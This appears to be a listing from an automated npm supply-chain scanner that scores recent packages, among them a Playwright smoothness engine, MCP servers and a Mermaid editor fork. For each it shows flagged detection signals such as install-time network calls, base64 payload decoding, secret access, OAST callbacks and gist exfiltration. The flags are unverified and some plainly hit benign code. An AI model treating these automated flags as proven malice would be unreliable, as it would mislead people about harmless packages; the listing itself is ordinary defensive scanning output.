Package purpose: The measuring engine behind playwright-smoothness: frame, input and long-list smoothness checks in Chromium, driven through a small adapter interface.
Claimed homepage: https://github.com/denodell/playwright-smoothness#readme
Matched naming pattern: npm-smoothness-general
Official vendor account: No — publisher domain doesn't match the brand it names
Weekly downloads: 0 (NEGLIGIBLE_OR_ZERO_USAGE)
Codebase size: 9058 lines, 458.1 kB (LARGE_CODEBASE)
Automated signals flagged:
  • INFOPackage release verified with cryptographic build provenance (npm_slsa_sigstore). Guarantees authentic repository build pipeline and eliminates publisher domain spoofing risk.
  • HIGHPackage registered recently (0 days ago) during the active AI hallucination slopsquatting wave.
  • HIGHSOURCE_CODE_DYNAMIC_EXECUTION: 'new Function()' found in package/dist/index.cjs:1952 (+1 more occurrence(s) elsewhere)
  • HIGHSOURCE_CODE_ENCODED_PAYLOAD: 'Buffer.from(..., 'base64')' found in package/dist/index.cjs:1261 (+1 more occurrence(s) elsewhere)
  • HIGHSOURCE_CODE_ENCODED_PAYLOAD: 'atob()' found in package/dist/index.cjs:1953 (+1 more occurrence(s) elsewhere)
  • HIGHSOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in package/dist/index.cjs:2433 (+1 more occurrence(s) elsewhere)
  • HIGHSUSPICIOUS_OBFUSCATION: 'Layered Base64 and Decompress Pipeline' found in package/dist/index.cjs:1261 (+1 more occurrence(s) elsewhere)
  • HIGHANTI_ANALYSIS_EVASION: 'CI/CD & Sandbox Environment Detection' found in package/dist/index.cjs:4069 (+1 more occurrence(s) elsewhere)

Fast growth plus these signals is worth a look; fast growth alone is not evidence of wrongdoing.

View package on npm →
0.1.1
npm Very Risky 95 ↑ 0.0/day 0 149 70h biblical
Author: GeiserX
Package purpose: MCP server for biblical-atlas, a Spanish Bible atlas: people, places, events, passages and their sources
Claimed homepage: https://github.com/GeiserX/biblical-atlas-mcp
Matched naming pattern: npm-biblical-general
Official vendor account: No — publisher domain doesn't match the brand it names
Weekly downloads: 0 (NEGLIGIBLE_OR_ZERO_USAGE)
Codebase size: 149 lines, 5.3 kB (TINY_CODEBASE)
Automated signals flagged:
  • INFOPackage release verified with cryptographic build provenance (npm_slsa_sigstore). Guarantees authentic repository build pipeline and eliminates publisher domain spoofing risk.
  • HIGHPackage registered recently (0 days ago) during the active AI hallucination slopsquatting wave.
  • HIGHLIFECYCLE_SCRIPT: 'postinstall' -> 'node postinstall.js'
  • HIGHSOURCE_CODE_DYNAMIC_EXECUTION: 'require('child_process')' found in package/postinstall.js:8 (+1 more occurrence(s) elsewhere)
  • HIGHSOURCE_CODE_DYNAMIC_EXECUTION: 'execSync/spawnSync' found in package/postinstall.js:85
  • HIGHSOURCE_CODE_NETWORK_CALL: 'require('http(s)')' found in package/postinstall.js:11
  • HIGHSOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in package/run.js:22
  • CRITICALINSTALL_TIME_NETWORK_SOCKET: 'postinstall' script runs package/postinstall.js, which makes network calls and executes/decodes/reads secrets

Fast growth plus these signals is worth a look; fast growth alone is not evidence of wrongdoing.

View package on npm →
0.9.120
npm Very Risky 82 ↑ 0.0/day 0 2,876 3d @myagentroam/marctl
Author: Unknown
Package purpose: MyAgentRoam command-line interface for authorized Node access.
Matched naming pattern: npm-@myagentroam/marctl-general
Official vendor account: No — publisher domain doesn't match the brand it names
Weekly downloads: 0 (NEGLIGIBLE_OR_ZERO_USAGE)
Codebase size: 2876 lines, 104.6 kB (LARGE_CODEBASE)
Automated signals flagged:
  • INFOPackage release verified with cryptographic build provenance (npm_slsa_sigstore). Guarantees authentic repository build pipeline and eliminates publisher domain spoofing risk.
  • HIGHPackage registered recently (0 days ago) during the active AI hallucination slopsquatting wave.
  • HIGHMISSING_SOURCE_REPOSITORY_URL
  • HIGHSOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in package/src/cli.mjs:11 (+2 more occurrence(s) elsewhere)
  • HIGHSOURCE_CODE_NETWORK_CALL: 'fetch/axios/XMLHttpRequest' found in package/src/client.mjs:167
  • HIGHSOURCE_CODE_DYNAMIC_EXECUTION: 'eval()' found in package/src/scp.mjs:12
  • HIGHSOURCE_CODE_ENCODED_PAYLOAD: 'Buffer.from(..., 'base64')' found in package/src/scp.mjs:12
  • CRITICALSOURCE_CODE_DYNAMIC_CODE_LOADER: execution primitive combined with decode/network/obfuscation call in package/src/scp.mjs

Fast growth plus these signals is worth a look; fast growth alone is not evidence of wrongdoing.

View package on npm →
0.1.2
npm Very Risky 147 ↑ 0.0/day 0 17,099 3d @juanpiecedev/jpcode
Author: JuanPiece
Package purpose: jpcode — el CLI de código de JuanPiece: pinta de Claude Code, modelos gratis y tu propia API key, con gateway local.
Claimed homepage: https://github.com/SoyJuanPiece/jpcode-cli#readme
Matched naming pattern: npm-@juanpiecedev/jpcode-general
Official vendor account: No — publisher domain doesn't match the brand it names
Weekly downloads: 0 (NEGLIGIBLE_OR_ZERO_USAGE)
Codebase size: 17099 lines, 20.6 MB (LARGE_CODEBASE)
Automated signals flagged:
  • INFOPackage release verified with cryptographic build provenance (npm_slsa_sigstore). Guarantees authentic repository build pipeline and eliminates publisher domain spoofing risk.
  • HIGHPackage registered recently (0 days ago) during the active AI hallucination slopsquatting wave.
  • HIGHLIFECYCLE_SCRIPT: 'postinstall' -> 'node postinstall.mjs'
  • HIGHSOURCE_CODE_NETWORK_CALL: 'fetch/axios/XMLHttpRequest' found in package/engine/chunks/acpAgent-UCU7OI47.js:71 (+26 more occurrence(s) elsewhere)
  • HIGHSOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in package/engine/chunks/acpAgent-UCU7OI47.js:52 (+111 more occurrence(s) elsewhere)
  • HIGHSOURCE_CODE_NETWORK_CALL: 'require('http(s)')' found in package/engine/chunks/anthropicContentGenerator-KXWARK3M.js:3 (+6 more occurrence(s) elsewhere)
  • HIGHSOURCE_CODE_DYNAMIC_EXECUTION: 'execSync/spawnSync' found in package/engine/chunks/chunk-2J5T4I5M.js:3 (+18 more occurrence(s) elsewhere)
  • HIGHSOURCE_CODE_ENCODED_PAYLOAD: 'Buffer.from(..., 'base64')' found in package/engine/chunks/chunk-2UOMCYQG.js:10 (+15 more occurrence(s) elsewhere)

Fast growth plus these signals is worth a look; fast growth alone is not evidence of wrongdoing.

View package on npm →
1.0.0
npm Very Risky 95 ↑ 0.0/day 0 8 4d @bluewin/utils
Author: security-research
Package purpose: providing general utility for Npm
Matched naming pattern: npm-@bluewin/utils-general
Official vendor account: No — publisher domain doesn't match the brand it names
Weekly downloads: 0 (NEGLIGIBLE_OR_ZERO_USAGE)
Codebase size: 8 lines, 243 Bytes (TINY_CODEBASE)
Automated signals flagged:
  • INFOPackage release verified with cryptographic build provenance (npm_slsa_sigstore). Guarantees authentic repository build pipeline and eliminates publisher domain spoofing risk.
  • HIGHPackage registered recently (0 days ago) during the active AI hallucination slopsquatting wave.
  • HIGHLIFECYCLE_SCRIPT: 'postinstall' -> 'node postinstall.js'
  • HIGHMISSING_SOURCE_REPOSITORY_URL
  • HIGHEXFILTRATION_DESTINATION_DETECTED: 'OAST / Callback Service' found in package/postinstall.js:3
  • HIGHSOURCE_CODE_NETWORK_CALL: 'require('http(s)')' found in package/postinstall.js:1
  • CRITICALINSTALL_TIME_NETWORK_SOCKET: 'postinstall' script runs package/postinstall.js, which makes network calls and executes/decodes/reads secrets
  • INFOPackage affiliated with trusted vendor '@bluewin/utils' (provenance:npm_slsa_sigstore). Applied 50% threat score dampening (140 -> 70) to reduce false positives while retaining hijack/takeover detection.

Fast growth plus these signals is worth a look; fast growth alone is not evidence of wrongdoing.

View package on npm →
0.1.0
npm Very Risky 97 ↑ 0.0/day 0 101 4d gitsama
Author: Unknown
Package purpose: Anime reactions for your Git workflow
Claimed homepage: https://github.com/tu-tu-op/GitSama#readme
Matched naming pattern: npm-gitsama-general
Official vendor account: No — publisher domain doesn't match the brand it names
Weekly downloads: 0 (NEGLIGIBLE_OR_ZERO_USAGE)
Codebase size: 101 lines, 4.2 kB (TINY_CODEBASE)
Automated signals flagged:
  • INFOPackage release verified with cryptographic build provenance (npm_slsa_sigstore). Guarantees authentic repository build pipeline and eliminates publisher domain spoofing risk.
  • HIGHPackage registered recently (0 days ago) during the active AI hallucination slopsquatting wave.
  • HIGHLIFECYCLE_SCRIPT: 'postinstall' -> 'node scripts/postinstall.js'
  • HIGHLIFECYCLE_SCRIPT: 'preuninstall' -> 'node scripts/preuninstall.js'
  • HIGHSOURCE_CODE_DYNAMIC_EXECUTION: 'execSync/spawnSync' found in package/bin/gitsama.js:13 (+2 more occurrence(s) elsewhere)
  • HIGHSOURCE_CODE_NETWORK_CALL: 'fetch/axios/XMLHttpRequest' found in package/scripts/postinstall.js:36
  • HIGHSOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in package/scripts/postinstall.js:64 (+1 more occurrence(s) elsewhere)
  • CRITICALINSTALL_TIME_NETWORK_SOCKET: 'postinstall' script runs package/scripts/postinstall.js, which makes network calls and executes/decodes/reads secrets

Fast growth plus these signals is worth a look; fast growth alone is not evidence of wrongdoing.

View package on npm →
0.1.0
npm Very Risky 75 ↑ 0.0/day 0 4,084 4d @smjr3/mermaid
Author: smjr3
Package purpose: Customizable distribution of Mermaid Live Editor, delivered as an npm package and buildable into a static site. Unofficial derivative of mermaid-js/mermaid-live-editor.
Claimed homepage: https://github.com/smjr3/mermaid-editor#readme
Matched naming pattern: npm-@smjr3/mermaid-general
Official vendor account: No — publisher domain doesn't match the brand it names
Weekly downloads: 0 (NEGLIGIBLE_OR_ZERO_USAGE)
Codebase size: 4084 lines, 143.8 kB (LARGE_CODEBASE)
Automated signals flagged:
  • INFOPackage release verified with cryptographic build provenance (npm_slsa_sigstore). Guarantees authentic repository build pipeline and eliminates publisher domain spoofing risk.
  • HIGHPackage registered recently (0 days ago) during the active AI hallucination slopsquatting wave.
  • HIGHLIFECYCLE_SCRIPT: 'postinstall' -> '(husky || node -e "process.exit(0)") && svelte-kit sync && (git config blame.ignoreRevsFile .git-blame-ignore-revs || node -e "process.exit(0)")'
  • HIGHSOURCE_CODE_DYNAMIC_EXECUTION: 'execSync/spawnSync' found in package/scripts/check-local-delta.js:21 (+1 more occurrence(s) elsewhere)
  • HIGHSOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in package/scripts/dev-force.js:3 (+3 more occurrence(s) elsewhere)
  • HIGHEXFILTRATION_DESTINATION_DETECTED: 'GitHub Gists API Exfiltration (Dead Drop)' found in package/src/lib/util/fileLoaders/gist.ts:51
  • HIGHSOURCE_CODE_NETWORK_CALL: 'fetch/axios/XMLHttpRequest' found in package/src/lib/util/util.ts:89
  • INFOSubstantial functional codebase (4084 LOC across 59 file(s)).

Fast growth plus these signals is worth a look; fast growth alone is not evidence of wrongdoing.

View package on npm →
0.1.0
npm Very Risky 95 ↑ 0.0/day 0 127 4d vpn
Author: GeiserX
Package purpose: MCP server for VPN Bypass, the macOS menu bar app that routes chosen domains and services around the VPN
Claimed homepage: https://github.com/GeiserX/vpn-bypass-mcp
Matched naming pattern: npm-vpn-general
Official vendor account: No — publisher domain doesn't match the brand it names
Weekly downloads: 0 (NEGLIGIBLE_OR_ZERO_USAGE)
Codebase size: 127 lines, 4.8 kB (TINY_CODEBASE)
Automated signals flagged:
  • INFOPackage release verified with cryptographic build provenance (npm_slsa_sigstore). Guarantees authentic repository build pipeline and eliminates publisher domain spoofing risk.
  • HIGHPackage registered recently (0 days ago) during the active AI hallucination slopsquatting wave.
  • HIGHLIFECYCLE_SCRIPT: 'postinstall' -> 'node postinstall.js'
  • HIGHSOURCE_CODE_DYNAMIC_EXECUTION: 'require('child_process')' found in package/postinstall.js:8 (+1 more occurrence(s) elsewhere)
  • HIGHSOURCE_CODE_DYNAMIC_EXECUTION: 'execSync/spawnSync' found in package/postinstall.js:82
  • HIGHSOURCE_CODE_NETWORK_CALL: 'require('http(s)')' found in package/postinstall.js:12
  • CRITICALINSTALL_TIME_NETWORK_SOCKET: 'postinstall' script runs package/postinstall.js, which makes network calls and executes/decodes/reads secrets
  • INFOPackage affiliated with trusted vendor 'vpn' (provenance:npm_slsa_sigstore). Applied 50% threat score dampening (140 -> 70) to reduce false positives while retaining hijack/takeover detection.

Fast growth plus these signals is worth a look; fast growth alone is not evidence of wrongdoing.

View package on npm →
0.11.0
npm Very Risky 105 ↑ 0.0/day 0 8,213 4d @agentid
Author: Unknown
Package purpose: AgentID helper — connect an agent that runs on your computer to its .agent name. Runs your agents in one background process (agentid agents …) or a name's identity on your own server (agentid host …).
Claimed homepage: https://agentid.dev/docs
Matched naming pattern: npm-@agentid-general
Official vendor account: No — publisher domain doesn't match the brand it names
Weekly downloads: 0 (NEGLIGIBLE_OR_ZERO_USAGE)
Codebase size: 8213 lines, 285.3 kB (LARGE_CODEBASE)
Automated signals flagged:
  • INFOPackage release verified with cryptographic build provenance (npm_slsa_sigstore). Guarantees authentic repository build pipeline and eliminates publisher domain spoofing risk.
  • HIGHPackage registered recently (0 days ago) during the active AI hallucination slopsquatting wave.
  • HIGHSOURCE_CODE_DYNAMIC_EXECUTION: 'execSync/spawnSync' found in package/dist/chunk-F7LCTCAA.js:262 (+1 more occurrence(s) elsewhere)
  • HIGHSOURCE_CODE_DYNAMIC_EXECUTION: 'Python Subprocess / OS Execution' found in package/dist/chunk-F7LCTCAA.js:206
  • HIGHSOURCE_CODE_ENCODED_PAYLOAD: 'Buffer.from(..., 'base64')' found in package/dist/cli.js:5199
  • HIGHSOURCE_CODE_ENCODED_PAYLOAD: 'atob()' found in package/dist/cli.js:333
  • HIGHSOURCE_CODE_NETWORK_CALL: 'fetch/axios/XMLHttpRequest' found in package/dist/cli.js:779
  • HIGHSOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in package/dist/cli.js:715

Fast growth plus these signals is worth a look; fast growth alone is not evidence of wrongdoing.

View package on npm →

LINK COPIED TO CLIPBOARD